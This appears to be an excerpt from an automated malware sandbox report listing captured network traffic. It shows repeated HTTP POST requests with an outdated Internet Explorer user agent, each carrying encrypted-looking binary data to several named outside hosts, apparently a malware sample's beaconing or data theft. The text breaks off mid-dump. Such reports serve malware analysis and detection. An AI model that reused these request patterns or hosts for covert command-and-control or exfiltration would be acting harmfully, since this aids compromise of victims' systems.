JQI5xuCAWIepkQOjM74m9RO/DcBI0TjtFNZE+maqGF8jkpZO9stK6cgzU6Pgb72eAUPrPzZitOHYaZJDRthkeDTi4I/vEYYV8yP0yuxSFH98eovIabXqaK7w7DM+NutOpjbxxohfUjaSp5FEHRRN8038M8FIem5Wro6kplHAUiIjt4tCvmmGZ5azVPFh18HLKYzwgij4UgwxUXa4UNXNUAnbIMqlfB0wZO8sy7FqmNXbym1vCNsjxslbqC/W5KpUoOnv7prBKHWPa+0ZjEUhh8lP64usmEu+24LD+lc7++XuGx+lhAzgdZC6eHrW3fpnGJsUjencqsLyVuHXYboYA6soTdIYAS3+891wpTUYgC/pA9MYUfKs3Rgsbj3L+YL+EAZ2FOxUnssmlpt1R3V8YW8nMHRgg1t/AEdWqRZektS6b35Ge/iDGLiCxijaL82WScsnd3V6LGK2knTjze4SvX3ACTfpA3NMRPiYBI09/csJJ8YAkcOWePXTGEohQM0lfiTR1kP/8PvPw3AxL8ePE4wk5T+JIsV9
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 67 54 45 71 77 2b 34 48 61 59 63 55 71 6e 66 47 2b 53 34 72 76 46 48 76 6a 34 68 75 69 42 75 78 41 6a 63 63 51 59 6a 53 62 46 50 6e 49 50 65 64 36 31 50 49 6d 48 6a 53 74 6f 75 46 4e 58 72 61 56 74 5a 32 63 54 52 6e 44 32 43 68 37 58 6b 78 7a 31 67 4c 62 38 6c 54 32 7a 50 6c 73 65 41 46 6f 6b 31 71 55 47 46 31 2f 6d 45 38 7a 2b 64 35 61 7a 57 6f 73 62 6d 65 4f 37 69 49 76 71 72 44 74 4b 6d 4a 49 31 63 4b 4e 64 6c 54 33 46 50 48 47 35 44 6f 33 37 6b 41 62 45 52 48 4d 38 51 71 36 78 6c 71 46 4c 35 47 66 39 6c 66 71 75 51 2f 35 6e 45 6d 79 69 66 58 42 39 63 61 4a 30 62 46 48 54 39 4f 6e 6f 4c 67 59 70 62 35 62 33 33 49 56 41 2b 65 71 38 67 56 70 65 56 71 33 58 6a 4f 52 37 63 61 79 33 4d 47 38 56 4f 44 77 42 46 57 35 65 6e 4e 39 31 6a 6c 44 6d 33 45 75 70 48 75 43 43 39 53 38 56 69 59 57 35 37 43 37 61 6a 6c 78 6e 68 6c 65 57 74 75 66 72 68 43 4d 58 58 36 52 68 6d 63 2f 7a 44 73 33 51 6c 47 5a 2b 43 34 6c 34 35 73 46 6b 36 65 6d 45 43 4c 62 5a 31 68 6f 73 66 56 64 73 43 34 55 39 67 7a 58 78 77 5a 53 55 76 57 63 66 54 6f 65 42 34 38 6f 65 31 32 4a 47 4e 39 33 4b 63 31 4b 4d 6e 4f 42 71 44 4a 4d 4e 63 49 48 6f 69 2f 55 45 6d 68 65 70 4d 43 48 6f 54 50 37 46 51 46 36 73 36 42 62 57 59 54 72 6f 43 74 4a 39 39 77 4d 6d 49 6d 47 39 55 54 32 2b 42 53 34 4f 7a 34 4d 35 65 47 6f 32 7a 41 66 7a 45 59 50 55 70 42 55 68 53 6b 53 46 44 43 6d 5a 6c 57 6e 79 30 7a 42 64 54 42 48 4b 47 4a 54 2b 78 68 51 61 4a 32 39 75 70 78 79 6d 71 64 38 54 50 67 37 4c 56 76 6b 46 41 63 34 36 42 67 56 47 49 51 53 51 7a 53 37 76 30 51 65 64 55 67 79 33 52 53 70 62 38 4c 76 64 55 6b 7a 4d 4e 6e 45 4b 58 7a 73 5a 48 53 6a 6e 2b 41 43 6c 33 70 5a 67 79 41 68 79 45 42 4c 77 45 6b 6c 4f 49 45 76 6a 49 58 4c 33 6d 63 52 34 70 2f 64 30 4c 52 33 5a 34 35 4c 55 44 78 43 35 69 62 74 6b 53 5a 53 77 3d 3d Data Ascii: gTEqw+4HaYcUqnfG+S4rvFHvj4huiBuxAjccQYjSbFPnIPed61PImHjStouFNXraVtZ2cTRnD2Ch7Xkxz1gLb8lT2zPlseAFok1qUGF1/mE8z+d5azWosbmeO7iIvqrDtKmJI1cKNdlT3FPHG5Do37kAbERHM8Qq6xlqFL5Gf9lfquQ/5nEmyifXB9caJ0bFHT9OnoLgYpb5b33IVA+eq8gVpeVq3XjOR7cay3MG8VODwBFW5enN91jlDm3EupHuCC9S8ViYW57C7ajlxnhleWtufrhCMXX6Rhmc/zDs3QlGZ+C4l45sFk6emECLbZ1hosfVdsC4U9gzXxwZSUvWcfToeB48oe12JGN93Kc1KMnOBqDJMNcIHoi/UEmhepMCHoTP7FQF6s6BbWYTroCtJ99wMmImG9UT2+BS4Oz4M5eGo2zAfzEYPUpBUhSkSFDCmZlWny0zBdTBHKGJT+xhQaJ29upxymqd8TPg7LVvkFAc46BgVGIQSQzS7v0QedUgy3RSpb8LvdUkzMNnEKXzsZHSjn+ACl3pZgyAhyEBLwEklOIEvjIXL3mcR4p/d0LR3Z45LUDxC5ibtkSZSw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 67 54 45 71 77 2b 34 48 61 59 63 55 71 6e 66 47 2b 53 34 72 76 46 48 76 6a 34 68 75 69 42 75 78 41 6a 63 63 51 59 6a 53 62 46 50 6e 49 50 65 64 36 31 50 49 6d 48 6a 53 74 6f 75 46 4e 58 72 61 56 74 5a 32 63 54 52 6e 44 32 43 68 37 58 6b 78 7a 31 67 4c 62 38 6c 54 32 7a 50 6c 73 65 41 46 6f 6b 31 71 55 47 46 31 2f 6d 45 38 7a 2b 64 35 61 7a 57 6f 73 62 6d 65 4f 37 69 49 76 71 72 44 74 4b 6d 4a 49 31 63 4b 4e 64 6c 54 33 46 50 48 47 35 44 6f 33 37 6b 41 62 45 52 48 4d 38 51 71 36 78 6c 71 46 4c 35 47 66 39 6c 66 71 75 51 2f 35 6e 45 6d 79 69 66 58 42 39 63 61 4a 30 62 46 48 54 39 4f 6e 6f 4c 67 59 70 62 35 62 33 33 49 56 41 2b 65 71 38 67 56 70 65 56 71 33 58 6a 4f 52 37 63 61 79 33 4d 47 38 56 4f 44 77 42 46 57 35 65 6e 4e 39 31 6a 6c 44 6d 33 45 75 70 48 75 43 43 39 53 38 56 69 59 57 35 37 43 37 61 6a 6c 78 6e 68 6c 65 57 74 75 66 72 68 43 4d 58 58 36 52 68 6d 63 2f 7a 44 73 33 51 6c 47 5a 2b 43 34 6c 34 35 73 46 6b 36 65 6d 45 43 4c 62 5a 31 68 6f 73 66 56 64 73 43 34 55 39 67 7a 58 78 77 5a 53 55 76 57 63 66 54 6f 65 42 34 38 6f 65 31 32 4a 47 4e 39 33 4b 63 31 4b 4d 6e 4f 42 71 44 4a 4d 4e 63 49 48 6f 69 2f 55 45 6d 68 65 70 4d 43 48 6f 54 50 37 46 51 46 36 73 36 42 62 57 59 54 72 6f 43 74 4a 39 39 77 4d 6d 49 6d 47 39 55 54 32 2b 42 53 34 4f 7a 34 4d 35 65 47 6f 32 7a 41 66 7a 45 59 50 55 70 42 55 68 53 6b 53 46 44 43 6d 5a 6c 57 6e 79 30 7a 42 64 54 42 48 4b 47 4a 54 2b 78 68 51 61 4a 32 39 75 70 78 79 6d 71 64 38 54 50 67 37 4c 56 76 6b 46 41 63 34 36 42 67 56 47 49 51 53 51 7a 53 37 76 30 51 65 64 55 67 79 33 52 53 70 62 38 4c 76 64 55 6b 7a 4d 4e 6e 45 4b 58 7a 73 5a 48 53 6a 6e 2b 41 43 6c 33 70 5a 67 79 41 68 79 45 42 4c 77 45 6b 6c 4f 49 45 76 6a 49 58 4c 33 6d 63 52 34 70 2f 64 30 4c 52 33 5a 34 35 4c 55 44 78 43 35 69 62 74 6b 53 5a 53 77 3d 3d Data Ascii: gTEqw+4HaYcUqnfG+S4rvFHvj4huiBuxAjccQYjSbFPnIPed61PImHjStouFNXraVtZ2cTRnD2Ch7Xkxz1gLb8lT2zPlseAFok1qUGF1/mE8z+d5azWosbmeO7iIvqrDtKmJI1cKNdlT3FPHG5Do37kAbERHM8Qq6xlqFL5Gf9lfquQ/5nEmyifXB9caJ0bFHT9OnoLgYpb5b33IVA+eq8gVpeVq3XjOR7cay3MG8VODwBFW5enN91jlDm3EupHuCC9S8ViYW57C7ajlxnhleWtufrhCMXX6Rhmc/zDs3QlGZ+C4l45sFk6emECLbZ1hosfVdsC4U9gzXxwZSUvWcfToeB48oe12JGN93Kc1KMnOBqDJMNcIHoi/UEmhepMCHoTP7FQF6s6BbWYTroCtJ99wMmImG9UT2+BS4Oz4M5eGo2zAfzEYPUpBUhSkSFDCmZlWny0zBdTBHKGJT+xhQaJ29upxymqd8TPg7LVvkFAc46BgVGIQSQzS7v0QedUgy3RSpb8LvdUkzMNnEKXzsZHSjn+ACl3pZgyAhyEBLwEklOIEvjIXL3mcR4p/d0LR3Z45LUDxC5ibtkSZSw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 58 50 58 30 50 32 72 55 53 34 64 4d 68 6c 4b 4a 54 66 68 45 45 43 31 35 35 64 57 61 31 48 57 50 50 75 32 79 32 59 75 46 47 4d 64 45 32 73 76 34 6f 46 43 55 6a 35 65 53 74 38 59 4d 41 41 68 66 44 70 52 73 37 52 4a 51 48 4b 56 70 69 42 66 55 6f 64 59 36 5a 64 69 5a 44 33 61 4f 55 77 44 79 76 78 38 53 53 78 33 64 51 65 62 68 32 4d 70 55 4b 53 75 34 69 46 4c 56 74 35 2f 6a 54 53 77 2f 79 57 36 31 6e 30 33 65 71 37 31 69 54 76 2f 6b 4c 41 65 73 2f 36 38 2b 6f 52 6d 34 47 6b 36 70 39 48 63 57 68 69 48 4d 47 75 33 32 38 6c 2b 42 56 6d 62 4d 72 34 59 72 4c 7a 38 79 32 51 4d 43 32 4f 37 50 49 65 43 65 61 43 43 43 50 50 69 64 69 73 4d 31 4f 36 68 30 30 35 4a 78 6c 6a 76 56 33 30 58 56 42 6f 77 6d 39 30 4d 72 71 50 45 2f 39 55 70 32 45 7a 62 66 30 6b 4b 76 4a 59 4a 79 2f 32 4e 50 66 6c 4b 7a 31 52 2f 4c 6c 69 6b 35 56 58 6e 32 4f 53 56 5a 49 4a 51 59 76 77 42 73 35 35 6d 58 73 4a 59 36 68 38 78 54 4f 64 65 7a 77 4a 49 4f 76 32 78 35 6b 56 57 31 58 67 51 59 52 58 35 38 4e 4b 31 70 67 64 4c 66 41 35 49 2b 53 76 62 67 50 59 72 45 79 52 72 59 63 48 4d 49 78 31 4a 46 59 6c 54 33 4f 46 78 30 43 73 79 5a 36 73 6f 61 71 59 78 53 49 76 52 74 78 2b 32 76 4d 77 63 48 53 6c 50 79 73 35 34 52 75 56 73 69 76 75 41 51 6f 70 42 74 37 4f 4b 46 77 34 79 74 64 37 46 4d 54 55 50 56 39 6f 4b 31 6d 79 77 6e 2b 2b 4a 31 31 6c 58 66 62 6c 6d 79 57 48 43 48 6a 2f 4a 71 48 61 42 39 71 47 69 58 59 79 69 4e 61 69 6c 4b 74 36 4a 2b 47 6e 42 6f 54 61 70 47 5a 42 50 34 62 68 72 58 4c 68 4a 6b 4b 52 4b 36 2b 62 6f 48 57 69 7a 43 31 53 67 41 6b 6f 36 57 50 51 32 57 76 48 2b 7a 64 48 6a 6f 35 2f 36 30 37 41 46 45 64 68 33 42 47 59 44 4b 4b 77 3d 3d Data Ascii: XPX0P2rUS4dMhlKJTfhEEC155dWa1HWPPu2y2YuFGMdE2sv4oFCUj5eSt8YMAAhfDpRs7RJQHKVpiBfUodY6ZdiZD3aOUwDyvx8SSx3dQebh2MpUKSu4iFLVt5/jTSw/yW61n03eq71iTv/kLAes/68+oRm4Gk6p9HcWhiHMGu328l+BVmbMr4YrLz8y2QMC2O7PIeCeaCCCPPidisM1O6h005JxljvV30XVBowm90MrqPE/9Up2Ezbf0kKvJYJy/2NPflKz1R/Llik5VXn2OSVZIJQYvwBs55mXsJY6h8xTOdezwJIOv2x5kVW1XgQYRX58NK1pgdLfA5I+SvbgPYrEyRrYcHMIx1JFYlT3OFx0CsyZ6soaqYxSIvRtx+2vMwcHSlPys54RuVsivuAQopBt7OKFw4ytd7FMTUPV9oK1mywn++J11lXfblmyWHCHj/JqHaB9qGiXYyiNailKt6J+GnBoTapGZBP4bhrXLhJkKRK6+boHWizC1SgAko6WPQ2WvH+zdHjo5/607AFEdh3BGYDKKw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 58 50 58 30 50 32 72 55 53 34 64 4d 68 6c 4b 4a 54 66 68 45 45 43 31 35 35 64 57 61 31 48 57 50 50 75 32 79 32 59 75 46 47 4d 64 45 32 73 76 34 6f 46 43 55 6a 35 65 53 74 38 59 4d 41 41 68 66 44 70 52 73 37 52 4a 51 48 4b 56 70 69 42 66 55 6f 64 59 36 5a 64 69 5a 44 33 61 4f 55 77 44 79 76 78 38 53 53 78 33 64 51 65 62 68 32 4d 70 55 4b 53 75 34 69 46 4c 56 74 35 2f 6a 54 53 77 2f 79 57 36 31 6e 30 33 65 71 37 31 69 54 76 2f 6b 4c 41 65 73 2f 36 38 2b 6f 52 6d 34 47 6b 36 70 39 48 63 57 68 69 48 4d 47 75 33 32 38 6c 2b 42 56 6d 62 4d 72 34 59 72 4c 7a 38 79 32 51 4d 43 32 4f 37 50 49 65 43 65 61 43 43 43 50 50 69 64 69 73 4d 31 4f 36 68 30 30 35 4a 78 6c 6a 76 56 33 30 58 56 42 6f 77 6d 39 30 4d 72 71 50 45 2f 39 55 70 32 45 7a 62 66 30 6b 4b 76 4a 59 4a 79 2f 32 4e 50 66 6c 4b 7a 31 52 2f 4c 6c 69 6b 35 56 58 6e 32 4f 53 56 5a 49 4a 51 59 76 77 42 73 35 35 6d 58 73 4a 59 36 68 38 78 54 4f 64 65 7a 77 4a 49 4f 76 32 78 35 6b 56 57 31 58 67 51 59 52 58 35 38 4e 4b 31 70 67 64 4c 66 41 35 49 2b 53 76 62 67 50 59 72 45 79 52 72 59 63 48 4d 49 78 31 4a 46 59 6c 54 33 4f 46 78 30 43 73 79 5a 36 73 6f 61 71 59 78 53 49 76 52 74 78 2b 32 76 4d 77 63 48 53 6c 50 79 73 35 34 52 75 56 73 69 76 75 41 51 6f 70 42 74 37 4f 4b 46 77 34 79 74 64 37 46 4d 54 55 50 56 39 6f 4b 31 6d 79 77 6e 2b 2b 4a 31 31 6c 58 66 62 6c 6d 79 57 48 43 48 6a 2f 4a 71 48 61 42 39 71 47 69 58 59 79 69 4e 61 69 6c 4b 74 36 4a 2b 47 6e 42 6f 54 61 70 47 5a 42 50 34 62 68 72 58 4c 68 4a 6b 4b 52 4b 36 2b 62 6f 48 57 69 7a 43 31 53 67 41 6b 6f 36 57 50 51 32 57 76 48 2b 7a 64 48 6a 6f 35 2f 36 30 37 41 46 45 64 68 33 42 47 59 44 4b 4b 77 3d 3d Data Ascii: XPX0P2rUS4dMhlKJTfhEEC155dWa1HWPPu2y2YuFGMdE2sv4oFCUj5eSt8YMAAhfDpRs7RJQHKVpiBfUodY6ZdiZD3aOUwDyvx8SSx3dQebh2MpUKSu4iFLVt5/jTSw/yW61n03eq71iTv/kLAes/68+oRm4Gk6p9HcWhiHMGu328l+BVmbMr4YrLz8y2QMC2O7PIeCeaCCCPPidisM1O6h005JxljvV30XVBowm90MrqPE/9Up2Ezbf0kKvJYJy/2NPflKz1R/Llik5VXn2OSVZIJQYvwBs55mXsJY6h8xTOdezwJIOv2x5kVW1XgQYRX58NK1pgdLfA5I+SvbgPYrEyRrYcHMIx1JFYlT3OFx0CsyZ6soaqYxSIvRtx+2vMwcHSlPys54RuVsivuAQopBt7OKFw4ytd7FMTUPV9oK1mywn++J11lXfblmyWHCHj/JqHaB9qGiXYyiNailKt6J+GnBoTapGZBP4bhrXLhJkKRK6+boHWizC1SgAko6WPQ2WvH+zdHjo5/607AFEdh3BGYDKKw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 6c 38 69 30 6b 4b 32 30 62 34 66 45 36 62 66 59 70 41 37 39 51 32 61 5a 31 4f 57 62 69 54 54 4c 4d 57 41 4c 71 50 34 51 6a 65 73 73 54 46 74 44 61 73 71 37 53 4d 75 6b 7a 55 4c 68 62 35 79 67 66 49 74 79 30 43 72 4d 6e 39 38 44 65 2f 71 38 57 64 6e 6c 31 6e 6c 35 49 33 45 6b 33 70 6a 4f 54 37 6e 75 68 76 6d 4d 52 66 35 45 57 4a 31 53 6e 4d 31 32 41 68 54 59 55 64 44 64 73 61 42 48 31 4e 35 74 78 74 52 52 54 6c 62 53 45 71 76 38 6b 51 61 33 78 45 5a 68 78 4f 46 7a 74 6d 68 51 6f 71 4d 57 49 6b 34 55 42 58 61 4d 6d 6f 59 38 36 4b 4e 68 71 32 35 48 42 39 36 4e 2f 4d 65 43 4a 52 6a 37 48 59 45 71 33 72 47 74 73 44 69 79 2f 52 2f 36 72 7a 5a 58 73 6a 75 66 38 65 46 52 72 59 6f 4c 51 4e 57 65 6e 37 6b 45 41 33 73 67 42 32 51 67 61 79 4f 54 35 65 33 44 5a 61 41 57 65 45 73 63 38 33 36 71 4d 35 48 41 5a 49 55 58 59 2f 50 62 78 43 4b 35 6a 74 6e 38 56 79 2b 71 79 6b 7a 4c 6d 4f 4b 5a 47 50 42 43 33 35 47 4e 39 4c 45 64 56 43 4d 68 7a 30 45 64 66 77 44 48 74 66 78 46 52 66 6f 68 5a 6c 77 68 6d 6f 65 71 66 64 44 72 55 6d 6a 4f 33 36 67 69 7a 32 2f 72 43 37 73 58 53 79 77 35 38 62 70 37 69 72 76 61 4a 45 30 42 56 33 36 6b 6f 78 32 38 33 6d 72 70 74 52 74 39 55 57 41 4c 30 77 6c 4a 67 76 49 69 6b 48 73 52 71 30 4f 44 47 56 72 4b 4a 31 74 49 69 2f 51 38 46 4d 65 75 41 56 6f 66 77 56 58 4d 32 43 50 43 51 32 78 36 7a 6d 44 44 4a 71 33 75 39 62 67 4b 43 2f 56 43 51 61 69 4a 66 47 78 74 6d 33 35 70 52 69 70 53 65 4a 69 50 54 79 62 34 45 38 37 37 4f 61 36 58 58 38 4d 45 36 70 63 2b 65 36 47 70 56 46 73 37 78 66 30 72 74 34 71 47 63 2b 2f 72 34 32 71 5a 59 35 62 48 59 6f 6f 62 46 38 55 73 42 33 32 7a 35 34 35 4c 45 74 4a 34 79 62 47 72 4b 50 50 74 32 49 75 75 72 37 74 50 6b 42 6c 36 30 68 2f 43 79 30 7a 31 55 51 74 48 77 75 6d 55 47 78 45 52 57 4f 39 77 69 4b 7a 6e 34 35 6f 3d Data Ascii: l8i0kK20b4fE6bfYpA79Q2aZ1OWbiTTLMWALqP4QjessTFtDasq7SMukzULhb5ygfIty0CrMn98De/q8Wdnl1nl5I3Ek3pjOT7nuhvmMRf5EWJ1SnM12AhTYUdDdsaBH1N5txtRRTlbSEqv8kQa3xEZhxOFztmhQoqMWIk4UBXaMmoY86KNhq25HB96N/MeCJRj7HYEq3rGtsDiy/R/6rzZXsjuf8eFRrYoLQNWen7kEA3sgB2QgayOT5e3DZaAWeEsc836qM5HAZIUXY/PbxCK5jtn8Vy+qykzLmOKZGPBC35GN9LEdVCMhz0EdfwDHtfxFRfohZlwhmoeqfdDrUmjO36giz2/rC7sXSyw58bp7irvaJE0BV36kox283mrptRt9UWAL0wlJgvIikHsRq0ODGVrKJ1tIi/Q8FMeuAVofwVXM2CPCQ2x6zmDDJq3u9bgKC/VCQaiJfGxtm35pRipSeJiPTyb4E877Oa6XX8ME6pc+e6GpVFs7xf0rt4qGc+/r42qZY5bHYoobF8UsB32z545LEtJ4ybGrKPPt2Iuur7tPkBl60h/Cy0z1UQtHwumUGxERWO9wiKzn45o=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 6c 38 69 30 6b 4b 32 30 62 34 66 45 36 62 66 59 70 41 37 39 51 32 61 5a 31 4f 57 62 69 54 54 4c 4d 57 41 4c 71 50 34 51 6a 65 73 73 54 46 74 44 61 73 71 37 53 4d 75 6b 7a 55 4c 68 62 35 79 67 66 49 74 79 30 43 72 4d 6e 39 38 44 65 2f 71 38 57 64 6e 6c 31 6e 6c 35 49 33 45 6b 33 70 6a 4f 54 37 6e 75 68 76 6d 4d 52 66 35 45 57 4a 31 53 6e 4d 31 32 41 68 54 59 55 64 44 64 73 61 42 48 31 4e 35 74 78 74 52 52 54 6c 62 53 45 71 76 38 6b 51 61 33 78 45 5a 68 78 4f 46 7a 74 6d 68 51 6f 71 4d 57 49 6b 34 55 42 58 61 4d 6d 6f 59 38 36 4b 4e 68 71 32 35 48 42 39 36 4e 2f 4d 65 43 4a 52 6a 37 48 59 45 71 33 72 47 74 73 44 69 79 2f 52 2f 36 72 7a 5a 58 73 6a 75 66 38 65 46 52 72 59 6f 4c 51 4e 57 65 6e 37 6b 45 41 33 73 67 42 32 51 67 61 79 4f 54 35 65 33 44 5a 61 41 57 65 45 73 63 38 33 36 71 4d 35 48 41 5a 49 55 58 59 2f 50 62 78 43 4b 35 6a 74 6e 38 56 79 2b 71 79 6b 7a 4c 6d 4f 4b 5a 47 50 42 43 33 35 47 4e 39 4c 45 64 56 43 4d 68 7a 30 45 64 66 77 44 48 74 66 78 46 52 66 6f 68 5a 6c 77 68 6d 6f 65 71 66 64 44 72 55 6d 6a 4f 33 36 67 69 7a 32 2f 72 43 37 73 58 53 79 77 35 38 62 70 37 69 72 76 61 4a 45 30 42 56 33 36 6b 6f 78 32 38 33 6d 72 70 74 52 74 39 55 57 41 4c 30 77 6c 4a 67 76 49 69 6b 48 73 52 71 30 4f 44 47 56 72 4b 4a 31 74 49 69 2f 51 38 46 4d 65 75 41 56 6f 66 77 56 58 4d 32 43 50 43 51 32 78 36 7a 6d 44 44 4a 71 33 75 39 62 67 4b 43 2f 56 43 51 61 69 4a 66 47 78 74 6d 33 35 70 52 69 70 53 65 4a 69 50 54 79 62 34 45 38 37 37 4f 61 36 58 58 38 4d 45 36 70 63 2b 65 36 47 70 56 46 73 37 78 66 30 72 74 34 71 47 63 2b 2f 72 34 32 71 5a 59 35 62 48 59 6f 6f 62 46 38 55 73 42 33 32 7a 35 34 35 4c 45 74 4a 34 79 62 47 72 4b 50 50 74 32 49 75 75 72 37 74 50 6b 42 6c 36 30 68 2f 43 79 30 7a 31 55 51 74 48 77 75 6d 55 47 78 45 52 57 4f 39 77 69 4b 7a 6e 34 35 6f 3d Data Ascii: l8i0kK20b4fE6bfYpA79Q2aZ1OWbiTTLMWALqP4QjessTFtDasq7SMukzULhb5ygfIty0CrMn98De/q8Wdnl1nl5I3Ek3pjOT7nuhvmMRf5EWJ1SnM12AhTYUdDdsaBH1N5txtRRTlbSEqv8kQa3xEZhxOFztmhQoqMWIk4UBXaMmoY86KNhq25HB96N/MeCJRj7HYEq3rGtsDiy/R/6rzZXsjuf8eFRrYoLQNWen7kEA3sgB2QgayOT5e3DZaAWeEsc836qM5HAZIUXY/PbxCK5jtn8Vy+qykzLmOKZGPBC35GN9LEdVCMhz0EdfwDHtfxFRfohZlwhmoeqfdDrUmjO36giz2/rC7sXSyw58bp7irvaJE0BV36kox283mrptRt9UWAL0wlJgvIikHsRq0ODGVrKJ1tIi/Q8FMeuAVofwVXM2CPCQ2x6zmDDJq3u9bgKC/VCQaiJfGxtm35pRipSeJiPTyb4E877Oa6XX8ME6pc+e6GpVFs7xf0rt4qGc+/r42qZY5bHYoobF8UsB32z545LEtJ4ybGrKPPt2Iuur7tPkBl60h/Cy0z1UQtHwumUGxERWO9wiKzn45o=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 79 68 7a 32 65 6d 47 67 66 34 65 46 74 36 38 41 77 4c 35 4a 6f 54 72 6e 61 32 52 66 63 51 4b 32 4a 52 58 54 79 6b 4b 67 6c 77 4f 68 61 61 2b 68 6c 6b 62 34 6c 37 77 65 64 64 38 48 79 32 79 33 79 32 4c 44 35 30 72 45 44 61 4d 62 5a 76 47 50 41 73 4d 41 78 65 66 4b 6c 35 71 68 52 42 6d 43 4b 68 38 4a 32 6f 76 6f 5a 65 79 47 44 46 6a 39 6a 44 75 6e 2f 59 44 33 43 41 43 45 6e 37 37 78 5a 77 36 56 35 6e 79 74 41 68 5a 64 73 5a 70 4d 41 37 72 34 5a 7a 47 44 39 78 6c 6e 36 41 7a 74 6c 4f 66 49 66 57 75 76 30 44 74 64 4a 4f 50 49 4d 53 7a 62 41 54 4f 67 6f 6f 50 34 30 34 53 6a 70 6c 6b 33 63 61 30 4f 56 4f 79 69 52 43 4c 57 46 53 34 62 52 44 6f 52 48 6d 58 53 71 41 39 55 37 53 6e 36 57 49 41 56 32 47 49 30 6d 31 55 6f 64 70 4f 30 56 75 76 41 7a 72 4b 54 65 79 34 61 37 6d 4d 48 58 7a 2b 46 48 69 4a 48 4d 65 54 67 72 54 48 72 59 76 65 6a 75 77 2f 74 6e 7a 54 52 6b 34 30 33 73 4e 2b 34 77 77 61 37 50 6f 66 41 7a 64 74 44 70 68 69 6f 69 43 42 76 70 4b 36 31 31 76 72 57 34 67 4f 65 48 44 79 67 55 64 74 61 6f 35 32 4b 49 65 45 34 59 64 78 59 2b 58 79 49 6e 6b 44 6f 6a 78 68 43 4e 50 73 4a 35 70 64 7a 47 36 33 43 65 46 50 76 38 51 4a 48 47 45 4e 43 66 66 54 54 43 70 58 72 32 69 63 4a 2b 59 72 35 75 41 4e 35 54 43 4c 43 4a 42 35 63 7a 39 68 73 76 76 50 33 37 61 32 5a 30 6c 5a 47 57 51 6d 70 50 53 65 78 35 33 33 35 7a 59 6d 32 47 70 43 56 6a 50 59 34 6e 58 74 35 2b 36 76 4a 35 54 65 41 50 34 43 6a 33 78 46 63 71 35 31 68 36 66 67 6c 51 57 4a 64 55 4b 78 4a 5a 5a 6a 39 42 79 65 36 45 6a 74 6e 33 73 56 63 61 41 70 41 4b 49 50 50 4b 32 5a 31 39 56 48 39 68 35 45 63 4c 54 6d 53 62 66 6c 32 79 4b 6a 7a 6e 41 69 73 74 78 53 57 39 78 63 79 41 37 73 50 4b 54 5a 6f 4c 36 62 36 61 66 63 71 54 72 45 47 Data Ascii: yhz2emGgf4eFt68AwL5JoTrna2RfcQK2JRXTykKglwOhaa+hlkb4l7wedd8Hy2y3y2LD50rEDaMbZvGPAsMAxefKl5qhRBmCKh8J2ovoZeyGDFj9jDun/YD3CACEn77xZw6V5nytAhZdsZpMA7r4ZzGD9xln6AztlOfIfWuv0DtdJOPIMSzbATOgooP404Sjplk3ca0OVOyiRCLWFS4bRDoRHmXSqA9U7Sn6WIAV2GI0m1UodpO0VuvAzrKTey4a7mMHXz+FHiJHMeTgrTHrYvejuw/tnzTRk403sN+4wwa7PofAzdtDphioiCBvpK611vrW4gOeHDygUdtao52KIeE4YdxY+XyInkDojxhCNPsJ5pdzG63CeFPv8QJHGENCffTTCpXr2icJ+Yr5uAN5TCLCJB5cz9hsvvP37a2Z0lZGWQmpPSex5335zYm2GpCVjPY4nXt5+6vJ5TeAP4Cj3xFcq51h6fglQWJdUKxJZZj9Bye6Ejtn3sVcaApAKIPPK2Z19VH9h5EcLTmSbfl2yKjznAistxSW9xcyA7sPKTZoL6b6afcqTrEG
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 5a 46 64 77 6b 4f 39 53 67 49 63 39 31 68 4f 4c 44 6d 4e 56 57 50 6a 4f 48 48 59 46 2b 75 47 35 6b 31 46 30 7a 78 47 33 79 64 75 76 7a 39 50 31 6e 6f 69 4d 45 42 72 76 36 6f 46 50 63 61 32 62 30 6d 73 75 6d 51 64 42 32 46 61 67 2b 76 6e 4b 62 4c 4f 58 48 4c 57 2f 35 30 32 54 6c 6e 4c 6e 4d 78 30 72 4a 2b 66 41 54 78 4f 74 57 75 47 52 79 46 33 43 76 54 48 6e 4f 6f 41 35 45 6f 30 4b 33 30 74 68 62 39 71 6d 63 38 75 4a 38 70 58 44 56 75 65 66 48 2f 69 4b 2b 65 36 54 6d 77 37 78 77 79 34 72 78 7a 68 58 43 35 4a 32 47 30 41 64 4a 73 52 53 37 59 32 42 36 65 32 2f 79 55 30 67 55 55 73 65 6e 33 35 51 51 4a 4d 62 66 67 6e 36 2b 48 63 71 44 35 5a 55 64 63 